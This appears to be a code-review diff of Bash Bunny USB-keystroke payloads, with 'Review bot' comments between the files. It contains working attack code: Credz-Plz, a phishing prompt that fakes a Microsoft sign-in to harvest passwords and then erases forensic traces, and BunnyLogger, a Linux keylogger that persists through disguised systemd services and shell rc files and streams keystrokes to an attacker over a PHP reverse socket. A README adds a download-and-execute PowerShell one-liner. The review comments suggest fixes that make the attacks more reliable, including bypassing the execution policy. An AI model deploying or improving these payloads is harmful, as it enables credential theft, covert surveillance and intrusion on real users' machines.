# Title: ET-Phone-Home
|
||||
# Description: this script will download and execute your locator script to find your device when it is plugged in
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Incident_Response
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ET-Phone-Home.ps1')"
|
||||
QUACK ENTER
|
|
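Review bot: the typed command `powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ET-Phone-Home.ps1')"` dot-sources a .ps1 file, so the execution policy applies; on a stock Windows 10/11 client the default is Restricted and the script will not run, and because of `-W Hidden` the failure is invisible. Add `-Exec Bypass` (the Credz-Plz README's own one-liner already uses it). `QUACK DELAY 100` between `QUACK GUI r` and the string leaves little time for the Run dialog to appear on a slower host; 500 ms or more is safer. The LED sequence stops at `LED STAGE2` with no `LED FINISH`, so the operator has no signal that the payload has finished typing.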
@ -0,0 +1,178 @@
|
|||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
|
||||
|
||||
.DESCRIPTION
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your Bash Bunny
|
||||
|
||||
#>
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
# Creating loot folder
|
||||
|
||||
# Get Drive Letter
|
||||
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
|
||||
|
||||
# Test if directory exists if not create directory in loot folder to store file
|
||||
$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
|
||||
|
||||
if(!(Test-Path -Path $TARGETDIR )){
|
||||
mkdir $TARGETDIR
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to generate the ui.prompt you will use to harvest their credentials
|
||||
#>
|
||||
|
||||
function Get-Creds {
|
||||
do{
|
||||
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
|
||||
if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
|
||||
[System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
|
||||
Get-Creds
|
||||
}
|
||||
$creds = $cred.GetNetworkCredential() | fl
|
||||
return $creds
|
||||
# ...
|
||||
|
||||
$done = $true
|
||||
} until ($done)
|
||||
|
||||
}
|
||||
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to pause the script until a mouse movement is detected
|
||||
#>
|
||||
|
||||
function Pause-Script{
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
|
||||
$o=New-Object -ComObject WScript.Shell
|
||||
|
||||
while (1) {
|
||||
$pauseTime = 3
|
||||
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
|
||||
break
|
||||
}
|
||||
else {
|
||||
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
|
||||
#>
|
||||
|
||||
function Caps-Off {
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
|
||||
|
||||
#If true, toggle CapsLock key, to ensure that the script doesn't fail
|
||||
if ($caps -eq $true){
|
||||
|
||||
$key = New-Object -ComObject WScript.Shell
|
||||
$key.SendKeys('{CapsLock}')
|
||||
}
|
||||
}
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
|
||||
#>
|
||||
|
||||
Pause-Script
|
||||
|
||||
Caps-Off
|
||||
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
|
||||
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
|
||||
|
||||
$creds = Get-Creds
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to save the gathered credentials to a file in the temp directory
|
||||
#>
|
||||
|
||||
echo $creds >> $env:TMP\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This exfiltrates your loot to the Bash Bunny
|
||||
#>
|
||||
|
||||
Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
|
|
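Review bot: the retry logic in Get-Creds is broken. When the target clicks OK with an empty password, the `IsNullOrWhiteSpace` check fires, the recursive `Get-Creds` call emits its result into the outer call's output stream, and execution then continues with `$creds = $cred.GetNetworkCredential() | fl` on the outer, still-empty `$cred`, so the function returns the real credential followed by an empty one (and when the prompt is cancelled `$cred` is `$null` and that line errors). The `do { ... } until ($done)` wrapper and `$done = $true` after `return $creds` are unreachable. Replace the recursion with a loop that re-prompts until `$cred` is non-null and the password is non-empty, then return once. Two further points: `$cred.getnetworkcredential().password` at the end of the prompt line writes the password to the console for no reason and should go; and the header `# Mode : HID` is inaccurate because `$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name` and the `Move-Item` into `$TARGETDIR` require the STORAGE attack mode that payload.txt declares.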
@ -0,0 +1,102 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Credz-Plz
|
||||
|
||||
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
|
||||
|
||||
## Description
|
||||
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your dropbox for collection
|
||||
|
||||
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)
|
||||
|
||||
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox or other file sharing service - Your Shared link for the intended file
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||
```
|
||||
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
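Review bot: this README describes a different payload from the one in this directory. `to later be exfiltrated with dropbox` and `uploaded to your dropbox for collection` contradict Credz-Plz.ps1, which does `Move-Item $env:TMP\$FileName $TARGETDIR\$FileName` into `$bb\loot\Credz-Plz\$env:computername` on the Bunny and never contacts Dropbox; the `Executing program` one-liner (`iwr https:// ... ?dl=1; invoke-expression $pl`) is not what payload.txt types, which runs the script from `payloads\$SWITCH_POSITION\Credz-Plz.ps1`; and both screenshots and the Project Link point at the O.MG versions (`OMG/Payloads/OMG-Credz-Plz/...` and `OMG-ADV-Recon`), the latter being a different payload entirely. Rewrite Dependencies and Executing program for the Bash Bunny flow (loot lands on the device under loot/Credz-Plz/<computername>), point Project Link at this payload's directory, and fix its malformed `[...)` markdown.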
@ -0,0 +1,22 @@
|
|||
# Title: Credz-Plz
|
||||
# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Recon
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
|
||||
QUACK ENTER
|
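Review bot: `# Category: Recon` disagrees with the ps1 header (`# Category : Credentials`) and with what the payload does, which is harvest a password; use Credentials so it files with the other credential payloads. The typed command has the same execution-policy gap as ET-Phone-Home's: it dot-sources `Credz-Plz.ps1` without `-Exec Bypass`, so on a default Restricted policy it fails, silently because of `-W Hidden`. `QUACK DELAY 100` after `QUACK GUI r` is short for the Run dialog, and there is no `LED FINISH` after `LED STAGE2`.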
|
@ -0,0 +1,62 @@
|
|||
## About:
|
||||
* Title: BunnyLogger
|
||||
* Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Credentials
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
|
||||
|
||||
### Features:
|
||||
* Live keystroke capturing.
|
||||
* Detailed key logs.
|
||||
* Persistent
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Workflow:
|
||||
* Encoding payload and injecting on target's system.
|
||||
* Checks whether internet is connected to the target system.
|
||||
* If internet is connected then it sends raw keystrokes to attacker.
|
||||
* Attacker processes raw keystrokes.
|
||||
|
||||
### Changes to be made in payload.sh:
|
||||
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
|
||||
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
|
||||
|
||||
### LED Status:
|
||||
* `SETUP` : MAGENTA
|
||||
* `ATTACK` : YELLOW
|
||||
* `FINISH` : GREEN
|
||||
|
||||
### Directory Structure of payload components:
|
||||
| FileName | Directory |
|
||||
| -------------- | ----------------------------- |
|
||||
| payload.txt | /payload/switch1/ |
|
||||
| payload.sh | /payload/ |
|
||||
| xinput | /tools/ |
|
||||
|
||||
### Usage:
|
||||
1. Encode payload.txt and inject into target's system.
|
||||
2. Start netcat listner on attacking system:
|
||||
|
||||
* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
|
||||
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
|
||||
3. Process raw keystrokes using BunnyLoggerDecoder utility:
|
||||
```
|
||||
./bunnyLoggerDecoder
|
||||
bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
|
||||
|
||||
Usage:
|
||||
Decode captured log: [./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
|
||||
|
||||
Options:
|
||||
-f Specify Log file.
|
||||
-m Select Mode(normal|informative)
|
||||
-o Specify Output file.
|
||||
-h For this banner.
|
||||
```
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
|
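Review bot: the directory table is wrong for the device layout. It lists `payload.txt | /payload/switch1/` and `payload.sh | /payload/`, but the Bunny's tree is `payloads/`, and payload.txt itself copies from `'$mntt'/payloads/payload.sh`; change both rows to `/payloads/...`. The decoder maps keycodes with `xmodmap -pke` run on the attacker's machine, so the README should state that decoding assumes the target's keyboard layout matches the attacker's, otherwise keys are mislabelled. `Checks whether internet is connected to the target system` overstates payload.sh, which only pings the attacker's IP. Typos: `traget`, `listner`, and `send them` should be `sends them`.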
@ -0,0 +1,50 @@
|
|||
usage () {
|
||||
echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
|
||||
echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]";
|
||||
echo -e "\nOptions:"
|
||||
echo -e "-f\tSpecify Log file."
|
||||
echo -e "-m\tSelect Mode(normal|informative)"
|
||||
echo -e "-o\tSpecify Output file."
|
||||
echo -e "-h\tFor this banner."
|
||||
}
|
||||
while getopts o:m:f:h: flag
|
||||
do
|
||||
case "${flag}" in
|
||||
o) output=$OPTARG ;;
|
||||
m) mode=$OPTARG ;;
|
||||
f) filename=$OPTARG ;;
|
||||
h) help=$OPTARG ;;
|
||||
*)
|
||||
usage
|
||||
exit 1
|
||||
esac
|
||||
done
|
||||
|
||||
if [ -z "$output" ] && [ -z "$filename" ]; then
|
||||
usage
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$filename" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$output" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$mode" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" == "normal" ] ; then
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" == "informative" ] ; then
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
|
||||
exit 1
|
||||
fi
|
|
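Review bot: `while getopts o:m:f:h: flag` declares `-h` as taking an argument, so a bare `./bunnyLoggerDecoder -h` is a missing-argument error that only reaches `usage` through the `*)` branch, with exit status 1, and `help=$OPTARG` is never used. Use `o:m:f:h` and `h) usage; exit 0 ;;`. Both success paths also `exit 1` after writing `$output`, which breaks `&&` chaining and makes every successful run look like a failure; exit 0 there. Quote `$filename` and `$output` in the awk and grep pipelines so paths with spaces work.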
@ -0,0 +1,24 @@
|
|||
#!/bin/bash
|
||||
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir /var/tmp/.system
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/tools/xinput /var/tmp/.system/
|
||||
echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/xinput
|
||||
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||
chmod +x /var/tmp/.system/reboot
|
||||
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
systemctl --user enable --now reboot.service
|
||||
systemctl --user start --now reboot.service
|
||||
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
||||
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
|
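Review bot: the connectivity check in the generated loop does not work. In `echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then ..."` the `$?` sits inside double quotes and is expanded by the installing shell, so `systemBus` is written with the exit status of the preceding `chmod` baked in (`if [ 0 -eq 0 ]`), the condition is always true, and when the listener is unreachable the loop spins `ping` and `php` with no sleep. Escape it as `\$?` the way `\$sock` is, or write the script with a quoted heredoc. Also: `unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE` unsets the variable before using it, so `rm -f` gets no path and nothing is removed; `lol=$(lsblk | grep 1.8G)` picks the Bunny by size with an unescaped `.`, matching any device lsblk prints as 1.8G (or 1x8G), whereas the BunnyLogger 2.0 payload.txt in this same commit already finds it by label (`lsblk -fs | grep BashBunny`), which is the right approach here too; and `-no-browser` in both `ExecStart=` lines is handed to scripts that ignore it.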
@ -0,0 +1,56 @@
|
|||
# Title: BunnyLogger
|
||||
# Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
|
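Review bot: `udisksctl mount -b /dev/'$disk' /tmp/tmppp` passes a mount-point operand that `udisksctl mount` has no option for (it mounts under /run/media/<user>/ or /media/); whether the extra argument errors or is ignored should be verified on a target, and it is unnecessary anyway since `mntt=$(lsblk | grep $disk | awk '{print $7}')` recovers the real path. Drop it as the 2.0 payload.txt does. Locating the device with `lol=$(lsblk | grep 1.8G)` is fragile (any disk lsblk shows as 1.8G, and `.` matches any character); the label-based `lsblk -fs | grep BashBunny` from the 2.0 payload should be used here as well. The README's table says `/payload/`, but this file copies `'$mntt'/payloads/payload.sh`; the README is the one to fix.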
@ -0,0 +1,39 @@
|
|||
## About:
|
||||
* Title: BunnyLogger 2.0
|
||||
* Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Credentials
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## BunnyLogger 2.0: BunnyLogger is a Key Logger which captures every key stroke of target and send them to attacker.
|
||||
|
||||
### Features:
|
||||
* Live keystroke capturing.
|
||||
* Stored Keystroke capturing.
|
||||
* Bunny Logger Manager: Interactive TUI Dashboard.
|
||||
* Detailed key logs.
|
||||
* Persistent.
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Directory Structure of payload components:
|
||||
|
||||
| FileName | Directory |
|
||||
| -------------- | ------------------------------ |
|
||||
| payload.txt | /payload/switch1/ |
|
||||
| payload.sh | /payload/ |
|
||||
| requirements/* | /payloads/library/bunnyLogger2 |
|
||||
|
||||
### LED Status:
|
||||
|
||||
* `LED SETUP` : MAGENTA
|
||||
* `LED ATTACK` : YELLOW
|
||||
* `LED FINISH` : GREEN
|
||||
|
||||
### Usage:
|
||||
* Install BunnyLogger 2.0: `chmod +x install.sh && sudo ./install.sh`
|
||||
* Run : `bunnyLoggerMgr` to launch BunnyLogger Manager.
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
|
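Review bot: `chmod +x install.sh && sudo ./install.sh` conflicts with what install.sh does. It creates `$HOME/.config/bunnyLogger` and `bunnyLogger.db`, so under sudo (depending on whether the sudo policy resets HOME) these can land in root's home, while `bunnyLoggerMgr` reads `~/.config/bunnyLogger/bunnyLogger.db` as the invoking user and `create` then cannot find its `payload.sh` template; install.sh already calls `sudo` itself for the `/usr/local/bin` copy, so document running it unprivileged. The header still says `Version: 1.0` under a `BunnyLogger 2.0` title; the directory table repeats the `/payload/` vs `/payloads/` mismatch (payload.txt copies `'$mntt'/payloads/payload.sh`); and nothing tells the operator that the `payload.sh` written by `bunnyLoggerMgr` option 2 (Create new target) has to be copied to the Bunny as `/payloads/payload.sh`, nor what the two port numbers it asks for are used for.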
@ -0,0 +1,7 @@
|
|||
#!/bin/bash
|
||||
loc=$HOME/.config/bunnyLogger
|
||||
mkdir $loc
|
||||
cp requirements/payload.sh $loc
|
||||
touch $loc/bunnyLogger.db
|
||||
chmod +x requirements/bunnyLoggerMgr
|
||||
sudo cp requirements/bunnyLoggerMgr /usr/local/bin/
|
|
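Review bot: `mkdir $loc` fails when `$HOME/.config/bunnyLogger` already exists and, with no `set -e`, the script carries on and hides the error; use `mkdir -p "$loc"` and quote `$loc` throughout. Privilege handling is mixed: the README says to run the whole script with `sudo`, which makes `$HOME` ambiguous for the config directory, while the script itself already does `sudo cp requirements/bunnyLoggerMgr /usr/local/bin/` for the one step that needs root. Run it as the normal user and keep the single `sudo` for the copy. `cp requirements/payload.sh $loc` and `chmod +x requirements/bunnyLoggerMgr` resolve `requirements/` against the caller's working directory; resolve it relative to the script (`cd "$(dirname "$0")"`) so the installer works from anywhere.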
@ -0,0 +1,53 @@
|
|||
# Title: BunnyLogger
|
||||
# Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
|
||||
